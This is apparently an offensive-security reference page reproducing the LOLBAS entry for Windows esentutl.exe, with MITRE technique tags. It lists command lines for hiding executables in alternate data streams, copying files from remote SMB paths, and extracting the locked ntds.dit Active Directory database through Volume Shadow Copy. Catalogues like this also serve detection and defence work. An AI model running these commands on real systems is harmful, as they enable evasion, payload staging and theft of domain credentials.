🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Esentutl.exe

Esentutl.exe

Binary for working with Microsoft Joint Engine Technology (JET) database

ADS

Copy file and hide it in an alternate data stream as a defensive counter measure

esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /o

Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. — MITRE: T1564.004 — Privileges: User

Extract hidden file within alternate data streams

esentutl.exe /y {PATH_ABSOLUTE}:file.exe /d {PATH_ABSOLUTE:.exe} /o

Copies the source Alternate Data Stream (ADS) to the destination EXE. — MITRE: T1564.004 — Privileges: User

Copy file and hide it in an alternate data stream as a defensive counter measure

esentutl.exe /y {PATH_SMB:.exe} /d {PATH_ABSOLUTE}:file.exe /o

Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. — MITRE: T1564.004 — Privileges: User

Copy

Copies files from A to B

esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o

Copies the source VBS file to the destination VBS file. — MITRE: T1105 — Privileges: User

Copy/extract a locked file such as the AD Database

esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d {PATH_ABSOLUTE:.dit}

Copies a (locked) file using Volume Shadow Copy — MITRE: T1003.003 — Privileges: Admin

Download

Use to copy files from one unc path to another

esentutl.exe /y {PATH_SMB:.source.exe} /d {PATH_SMB:.dest.exe} /o

Copies the source EXE to the destination EXE file — MITRE: T1564.004 — Privileges: User